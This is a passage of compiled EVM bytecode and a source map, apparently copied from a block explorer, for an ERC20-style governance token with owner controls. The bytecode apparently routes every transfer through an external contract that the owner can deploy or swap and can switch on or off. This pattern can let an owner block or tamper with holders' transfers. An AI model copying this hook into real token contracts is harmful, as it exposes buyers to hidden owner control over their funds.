ffffffffffffffffffffffff16815260200190815260200160002060008363ffffffff1663ffffffff1681526020019081526020016000206001015493505050505b92915050565b610d28611522565b73ffffffffffffffffffffffffffffffffffffffff16610d46610de0565b73ffffffffffffffffffffffffffffffffffffffff1614610d9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d93906127ad565b60405180910390fd5b600360009054906101000a900460ff1615600360006101000a81548160ff021916908315150217905550565b600b6020528060005260406000206000915090505481565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b606060068054610e1890612730565b80601f0160208091040260200160405190810160405280929190818152602001828054610e4490612730565b8015610e915780601f10610e6657610100808354040283529160200191610e91565b820191906000526020600020905b815481529060010190602001808311610e7457829003601f168201915b5050505050905090565b600080600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff16905060008163ffffffff1611610f05576000610f72565b600960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600183610f53919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b915050919050565b600061103d610f87611522565b84611038856040518060600160405280602581526020016130fa6025913960026000610fb1611522565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b61152a565b6001905092915050565b600061105b611054611522565b84846116f3565b6001905092915050565b8073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36001600060146101000a81548160ff02191690831515021790555050565b6110e6611522565b73ffffffffffffffffffffffffffffffffffffffff16611104610de0565b73ffffffffffffffffffffffffffffffffffffffff161461115a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611151906127ad565b60405180910390fd5b60011515600360009054906101000a900460ff1615150361128857600082111561118c5761118781611888565b6111f6565b6040516111989061227e565b604051809103906000f0801580156111b4573d6000803e3d6000fd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28585856040518463ffffffff1660e01b815260040161125593929190612926565b600060405180830381600087803b15801561126f57600080fd5b505af1158015611283573d6000803e3d6000fd5b505050505b50505050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b7fe48329057bfd03d55e49b547132e39cffd9c1820ad7b9d4c5307691425d15adf81565b6009602052816000526040600020602052806000526040600020600091509150508060000160009054906101000a900463ffffffff16908060010154905082565b611382611522565b73ffffffffffffffffffffffffffffffffffffffff166113a0610de0565b73ffffffffffffffffffffffffffffffffffffffff16146113f6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113ed906127ad565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611465576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161145c906129cf565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611599576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159090612a61565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611608576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115ff90612af3565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516116e6919061245b565b60405180910390a3505050565b6116fe8383836118da565b6117c7600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16600860008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1683611b71565b505050565b6000838311158290611814576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161180b919061231b565b60405180910390fd5b5082846118219190612b13565b90509392505050565b60008082846118399190612b47565b90508381101561187e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161187590612bc7565b60405180910390fd5b8091505092915050565b611890611e20565b156118d75780600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505b50565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611949576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161194090612c59565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119b8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119af90612ceb565b60405180910390fd5b6119c3838383611e36565b611a2f8160405180606001604052806026815260200161307e60269139600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546117cc9092919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611ac481600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461182a90919063ffffffff16565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611b64919061245b565b60405180910390a3505050565b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bad5750600081115b15611e1b57600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614611ce6576000600a60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611c50576000611cbd565b600960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611c9e919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611cd48483611ecc90919063ffffffff16565b9050611ce286848484611f25565b5050505b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614611e1a576000600a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900463ffffffff1690506000808263ffffffff1611611d84576000611df1565b600960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600184611dd2919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101545b90506000611e08848361182a90919063ffffffff16565b9050611e1685848484611f25565b5050505b5b505050565b60008060149054906101000a900460ff16905090565b600760019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16636bf92ea28484846040518463ffffffff1660e01b8152600401611e9593929190612926565b600060405180830381600087803b158015611eaf57600080fd5b505af1158015611ec3573d6000803e3d6000fd5b50505050505050565b600082821115611f11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f0890612d57565b60405180910390fd5b8183611f1d9190612b13565b905092915050565b6000611f49436040518060600160405280602e81526020016130cc602e9139612228565b905060008463ffffffff16118015611fe757508063ffffffff16600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000600187611fb1919061288e565b63ffffffff1663ffffffff16815260200190815260200160002060000160009054906101000a900463ffffffff1663ffffffff16145b156120615781600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600060018761203b919061288e565b63ffffffff1663ffffffff168152602001908152602001600020600101819055506121d1565b60405180604001604052808263ffffffff16815260200183815250600960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008663ffffffff1663ffffffff16815260200190815260200160002060008201518160000160006101000a81548163ffffffff021916908363ffffffff160217905550602082015181600101559050508363ffffffff166001856121209190612d77565b63ffffffff1611612166576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161215d90612e21565b60405180910390fd5b6001846121739190612d77565b600a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548163ffffffff021916908363ffffffff1602179055505b8473ffffffffffffffffffffffffffffffffffffffff167fdec2bacdd2f05b59de34da9b523dff8be42e5e38e818c82fdb0bae774387a7248484604051612219929190612e41565b60405180910390a25050505050565b600064010000000083108290612274576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226b919061231b565b60405180910390fd5b5082905092915050565b61021380612e6b83390190565b600081519050919050565b600082825260208201905092915050565b60005b838110156122c55780820151818401526020810190506122aa565b60008484015250505050565b6000601f19601f8301169050919050565b60006122ed8261228b565b6122f78185612296565b93506123078185602086016122a7565b612310816122d1565b840191505092915050565b6000602082019050818103600083015261233581846122e2565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061236d82612342565b9050919050565b61237d81612362565b811461238857600080fd5b50565b60008135905061239a81612374565b92915050565b6000819050919050565b6123b3816123a0565b81146123be57600080fd5b50565b6000813590506123d0816123aa565b92915050565b600080604083850312156123ed576123ec61233d565b5b60006123fb8582860161238b565b925050602061240c858286016123c1565b9150509250929050565b60008115159050919050565b61242b81612416565b82525050565b60006020820190506124466000830184612422565b92915050565b612455816123a0565b82525050565b6000602082019050612470600083018461244c565b92915050565b6000819050919050565b61248981612476565b82525050565b60006020820190506124a46000830184612480565b92915050565b6000806000606084860312156124c3576124c261233d565b5b60006124d18682870161238b565b93505060206124e28682870161238b565b92505060406124f3868287016123c1565b9150509250925092565b600060ff82169050919050565b612513816124fd565b82525050565b600060208201905061252e600083018461250a565b92915050565b60006020828403121561254a5761254961233d565b5b60006125588482850161238b565b91505092915050565b600063ffffffff82169050919050565b61257a81612561565b82525050565b60006020820190506125956000830184612571565b92915050565b6125a481612362565b82525050565b60006020820190506125bf600083018461259b565b92915050565b600080600080608085870312156125df576125de61233d565b5b60006125ed8782880161238b565b94505060206125fe8782880161238b565b935050604061260f878288016123c1565b92505060606126208782880161238b565b91505092959194509250565b600080604083850312156126435761264261233d565b5b60006126518582860161238b565b92505060206126628582860161238b565b9150509250929050565b61267581612561565b811461268057600080fd5b50565b6000813590506126928161266c565b92915050565b600080604083850312156126af576126ae61233d565b5b60006126bd8582860161238b565b92505060206126ce85828601612683565b9150509250929050565b60006040820190506126ed6000830185612571565b6126fa602083018461244c565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061274857607f821691505b60208210810361275b5761275a612701565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612797602083612296565b91506127a282612761565b602082019050919050565b600060208201905081810360008301526127c68161278a565b9050919050565b7f6765745072696f72566f7465733a206e6f74207965742064657465726d696e6560008201527f6400000000000000000000000000000000000000000000000000000000000000602082015250565b6000612829602183612296565b9150612834826127cd565b604082019050919050565b600060208201905081810360008301526128588161281c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061289982612561565b91506128a483612561565b9250828203905063ffffffff8111156128c0576128bf61285f565b5b92915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061290082612561565b915061290b83612561565b92508261291b5761291a6128c6565b5b828204905092915050565b600060608201905061293b600083018661259b565b612948602083018561259b565b612955604083018461244c565b949350505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006129b9602683612296565b91506129c48261295d565b604082019050919050565b600060208201905081810360008301526129e8816129ac565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612a4b602483612296565b9150612a56826129ef565b604082019050919050565b60006020820190508181036000830152612a7a81612a3e565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612add602283612296565b9150612ae882612a81565b604082019050919050565b60006020820190508181036000830152612b0c81612ad0565b9050919050565b6000612b1e826123a0565b9150612b29836123a0565b9250828203905081811115612b4157612b4061285f565b5b92915050565b6000612b52826123a0565b9150612b5d836123a0565b9250828201905080821115612b7557612b7461285f565b5b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000612bb1601b83612296565b9150612bbc82612b7b565b602082019050919050565b60006020820190508181036000830152612be081612ba4565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612c43602583612296565b9150612c4e82612be7565b604082019050919050565b60006020820190508181036000830152612c7281612c36565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612cd5602383612296565b9150612ce082612c79565b604082019050919050565b60006020820190508181036000830152612d0481612cc8565b9050919050565b7f536166654d6174683a207375627472616374696f6e206f766572666c6f770000600082015250565b6000612d41601e83612296565b9150612d4c82612d0b565b602082019050919050565b60006020820190508181036000830152612d7081612d34565b9050919050565b6000612d8282612561565b9150612d8d83612561565b9250828201905063ffffffff811115612da957612da861285f565b5b92915050565b7f5f7772697465436865636b706f696e743a206e657720636865636b706f696e7460008201527f2065786365656473203332206269747300000000000000000000000000000000602082015250565b6000612e0b603083612296565b9150612e1682612daf565b604082019050919050565b60006020820190508181036000830152612e3a81612dfe565b9050919050565b6000604082019050612e56600083018561244c565b612e63602083018461244c565b939250505056fe608060405234801561001057600080fd5b506101f3806100206000396000f3fe608060405234801561001057600080fd5b506004361061002b5760003560e01c80636bf92ea214610030575b600080fd5b61004a6004803603810190610045919061016a565b61004c565b005b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610101826100d6565b9050919050565b610111816100f6565b811461011c57600080fd5b50565b60008135905061012e81610108565b92915050565b6000819050919050565b61014781610134565b811461015257600080fd5b50565b6000813590506101648161013e565b92915050565b600080600060608486031215610183576101826100d1565b5b60006101918682870161011f565b93505060206101a28682870161011f565b92505060406101b386828701610155565b915050925092509256fea26469706673582212208638fb8578cb625921b4e32d8c49a570caf22772e999638675691fa63f332d2064736f6c6343000813003345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655f7772697465436865636b706f696e743a20626c6f636b206e756d6265722065786365656473203332206269747345524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b03fb7f33fb15d19b73ddea47ceceb436a49c83817c9953418d63e785809fb7c64736f6c63430008130033
Deployed Bytecode Sourcemap
24769:7058:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15426:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17187:169;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15034:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26251:122;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17838:321;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16345:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18568:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14286:26;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26129:49;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15580:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9512:148;;;:::i;:::-;;27966:1247;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;31396:92;;;:::i;:::-;;26665:39;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8861:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15261:95;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;27287:248;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19289:269;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16651:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8618:164;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22419:275;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16889:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;26467:117;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;25990:70;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;;:::i;:::-;;;;;;;;9815:244;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15426:91;15471:13;15504:5;15497:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15426:91;:::o;17187:169::-;17270:4;17287:39;17296:12;:10;:12::i;:::-;17310:7;17319:6;17287:8;:39::i;:::-;17344:4;17337:11;;17187:169;;;;:::o;15034:108::-;15095:7;15122:12;;15115:19;;15034:108;:::o;26251:122::-;26293:80;26251:122;:::o;17838:321::-;17944:4;17961:36;17971:6;17979:9;17990:6;17961:9;:36::i;:::-;18008:121;18017:6;18025:12;:10;:12::i;:::-;18039:89;18077:6;18039:89;;;;;;;;;;;;;;;;;:11;:19;18051:6;18039:19;;;;;;;;;;;;;;;:33;18059:12;:10;:12::i;:::-;18039:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;18008:8;:121::i;:::-;18147:4;18140:11;;17838:321;;;;;:::o;16345:91::-;16394:5;16419:9;;;;;;;;;;;16412:16;;16345:91;:::o;18568:218::-;18656:4;18673:83;18682:12;:10;:12::i;:::-;18696:7;18705:50;18744:10;18705:11;:25;18717:12;:10;:12::i;:::-;18705:25;;;;;;;;;;;;;;;:34;18731:7;18705:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;18673:8;:83::i;:::-;18774:4;18767:11;;18568:218;;;;:::o;14286:26::-;;;;;;;;;;;;;:::o;26129:49::-;;;;;;;;;;;;;;;;;;;;;;:::o;15580:127::-;15654:7;15681:9;:18;15691:7;15681:18;;;;;;;;;;;;;;;;15674:25;;15580:127;;;:::o;9512:148::-;9092:12;:10;:12::i;:::-;9081:23;;:7;:5;:7::i;:::-;:23;;;9073:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9619:1:::1;9582:40;;9603:6;::::0;::::1;;;;;;;;9582:40;;;;;;;;;;;;9650:1;9633:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;9512:148::o:0;27966:1247::-;28074:7;28121:12;28107:11;:26;28099:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;28184:19;28206:14;:23;28221:7;28206:23;;;;;;;;;;;;;;;;;;;;;;;;;28184:45;;28260:1;28244:12;:17;;;28240:58;;28285:1;28278:8;;;;;28240:58;28410:11;28358;:20;28370:7;28358:20;;;;;;;;;;;;;;;:38;28394:1;28379:12;:16;;;;:::i;:::-;28358:38;;;;;;;;;;;;;;;:48;;;;;;;;;;;;:63;;;28354:147;;28445:11;:20;28457:7;28445:20;;;;;;;;;;;;;;;:38;28481:1;28466:12;:16;;;;:::i;:::-;28445:38;;;;;;;;;;;;;;;:44;;;28438:51;;;;;28354:147;28598:11;28562;:20;28574:7;28562:20;;;;;;;;;;;;;;;:23;28583:1;28562:23;;;;;;;;;;;;;:33;;;;;;;;;;;;:47;;;28558:88;;;28633:1;28626:8;;;;;28558:88;28658:12;28685;28715:1;28700:12;:16;;;;:::i;:::-;28685:31;;28727:428;28742:5;28734:13;;:5;:13;;;28727:428;;;28764:13;28806:1;28797:5;28789;:13;;;;:::i;:::-;28788:19;;;;:::i;:::-;28780:5;:27;;;;:::i;:::-;28764:43;;28849:20;28872:11;:20;28884:7;28872:20;;;;;;;;;;;;;;;:28;28893:6;28872:28;;;;;;;;;;;;;;;28849:51;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28935:11;28919:2;:12;;;:27;;;28915:229;;28974:2;:8;;;28967:15;;;;;;;;;28915:229;29023:11;29008:2;:12;;;:26;;;29004:140;;;29063:6;29055:14;;29004:140;;;29127:1;29118:6;:10;;;;:::i;:::-;29110:18;;29004:140;28749:406;;28727:428;;;29172:11;:20;29184:7;29172:20;;;;;;;;;;;;;;;:27;29193:5;29172:27;;;;;;;;;;;;;;;:33;;;29165:40;;;;;27966:1247;;;;;:::o;31396:92::-;9092:12;:10;:12::i;:::-;9081:23;;:7;:5;:7::i;:::-;:23;;;9073:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;31466:14:::1;;;;;;;;;;;31465:15;31448:14;;:32;;;;;;;;;;;;;;;;;;31396:92::o:0;26665:39::-;;;;;;;;;;;;;;;;;:::o;8861:87::-;8907:7;8934:6;;;;;;;;;;;8927:13;;8861:87;:::o;15261:95::-;15308:13;15341:7;15334:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15261:95;:::o;27287:248::-;27372:7;27397:19;27419:14;:23;27434:7;27419:23;;;;;;;;;;;;;;;;;;;;;;;;;27397:45;;27475:1;27460:12;:16;;;:67;;27526:1;27460:67;;;27479:11;:20;27491:7;27479:20;;;;;;;;;;;;;;;:38;27515:1;27500:12;:16;;;;:::i;:::-;27479:38;;;;;;;;;;;;;;;:44;;;27460:67;27453:74;;;27287:248;;;:::o;19289:269::-;19382:4;19399:129;19408:12;:10;:12::i;:::-;19422:7;19431:96;19470:15;19431:96;;;;;;;;;;;;;;;;;:11;:25;19443:12;:10;:12::i;:::-;19431:25;;;;;;;;;;;;;;;:34;19457:7;19431:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;19399:8;:129::i;:::-;19546:4;19539:11;;19289:269;;;;:::o;16651:175::-;16737:4;16754:42;16764:12;:10;:12::i;:::-;16778:9;16789:6;16754:9;:42::i;:::-;16814:4;16807:11;;16651:175;;;;:::o;8618:164::-;8725:9;8692:43;;8721:1;8692:43;;;;;;;;;;;;8770:4;8746:21;;:28;;;;;;;;;;;;;;;;;;8618:164;:::o;22419:275::-;9092:12;:10;:12::i;:::-;9081:23;;:7;:5;:7::i;:::-;:23;;;9073:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;22538:4:::1;22522:20;;:14;;;;;;;;;;;:20;;::::0;22519:168:::1;;22566:1;22557:6;:10;22554:86;;;22569:18;22582:4;22569:12;:18::i;:::-;22554:86;;;22616:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;22611:4;;:19;;;;;;;;;;;;;;;;;;22554:86;22650:4;;;;;;;;;;;:9;;;22660:4;22666:2;22670:6;22650:27;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;::::0;::::1;;;;;;;;;22519:168;22419:275:::0;;;;:::o;16889:151::-;16978:7;17005:11;:18;17017:5;17005:18;;;;;;;;;;;;;;;:27;17024:7;17005:27;;;;;;;;;;;;;;;;16998:34;;16889:151;;;;:::o;26467:117::-;26513:71;26467:117;:::o;25990:70::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::o;9815:244::-;9092:12;:10;:12::i;:::-;9081:23;;:7;:5;:7::i;:::-;:23;;;9073:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9924:1:::1;9904:22;;:8;:22;;::::0;9896:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10014:8;9985:38;;10006:6;::::0;::::1;;;;;;;;9985:38;;;;;;;;;;;;10043:8;10034:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;9815:244:::0;:::o;7812:98::-;7865:7;7892:10;7885:17;;7812:98;:::o;21635:346::-;21754:1;21737:19;;:5;:19;;;21729:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21835:1;21816:21;;:7;:21;;;21808:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21919:6;21889:11;:18;21901:5;21889:18;;;;;;;;;;;;;;;:27;21908:7;21889:27;;;;;;;;;;;;;;;:36;;;;21957:7;21941:32;;21950:5;21941:32;;;21966:6;21941:32;;;;;;:::i;:::-;;;;;;;;21635:346;;;:::o;25001:235::-;25100:42;25116:6;25124:9;25135:6;25100:15;:42::i;:::-;25153:65;25168:10;:18;25179:6;25168:18;;;;;;;;;;;;;;;;;;;;;;;;;25188:10;:21;25199:9;25188:21;;;;;;;;;;;;;;;;;;;;;;;;;25211:6;25153:14;:65::i;:::-;25001:235;;;:::o;5937:166::-;6023:7;6056:1;6051;:6;;6059:12;6043:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;6094:1;6090;:5;;;;:::i;:::-;6083:12;;5937:166;;;;;:::o;3110:179::-;3168:7;3188:9;3204:1;3200;:5;;;;:::i;:::-;3188:17;;3229:1;3224;:6;;3216:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3280:1;3273:8;;;3110:179;;;;:::o;23459:127::-;23515:18;:16;:18::i;:::-;23511:68;;;23565:1;23549:4;;:18;;;;;;;;;;;;;;;;;;23511:68;23459:127;:::o;20048:549::-;20172:1;20154:20;;:6;:20;;;20146:70;;;;;;;;;;;;:::i;:::-;;;;;;;;;20256:1;20235:23;;:9;:23;;;20227:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;20311:47;20332:6;20340:9;20351:6;20311:20;:47::i;:::-;20391:71;20413:6;20391:71;;;;;;;;;;;;;;;;;:9;:17;20401:6;20391:17;;;;;;;;;;;;;;;;:21;;:71;;;;;:::i;:::-;20371:9;:17;20381:6;20371:17;;;;;;;;;;;;;;;:91;;;;20496:32;20521:6;20496:9;:20;20506:9;20496:20;;;;;;;;;;;;;;;;:24;;:32;;;;:::i;:::-;20473:9;:20;20483:9;20473:20;;;;;;;;;;;;;;;:55;;;;20571:9;20554:35;;20563:6;20554:35;;;20582:6;20554:35;;;;;;:::i;:::-;;;;;;;;20048:549;;;:::o;29221:947::-;29327:6;29317:16;;:6;:16;;;;:30;;;;;29346:1;29337:6;:10;29317:30;29313:848;;;29386:1;29368:20;;:6;:20;;;29364:385;;29457:16;29476:14;:22;29491:6;29476:22;;;;;;;;;;;;;;;;;;;;;;;;;29457:41;;29517:17;29549:1;29537:9;:13;;;:60;;29596:1;29537:60;;;29553:11;:19;29565:6;29553:19;;;;;;;;;;;;;;;:34;29585:1;29573:9;:13;;;;:::i;:::-;29553:34;;;;;;;;;;;;;;;:40;;;29537:60;29517:80;;29616:17;29636:21;29650:6;29636:9;:13;;:21;;;;:::i;:::-;29616:41;;29676:57;29693:6;29701:9;29712;29723;29676:16;:57::i;:::-;29390:359;;;29364:385;29787:1;29769:20;;:6;:20;;;29765:385;;29858:16;29877:14;:22;29892:6;29877:22;;;;;;;;;;;;;;;;;;;;;;;;;29858:41;;29918:17;29950:1;29938:9;:13;;;:60;;29997:1;29938:60;;;29954:11;:19;29966:6;29954:19;;;;;;;;;;;;;;;:34;29986:1;29974:9;:13;;;;:::i;:::-;29954:34;;;;;;;;;;;;;;;:40;;;29938:60;29918:80;;30017:17;30037:21;30051:6;30037:9;:13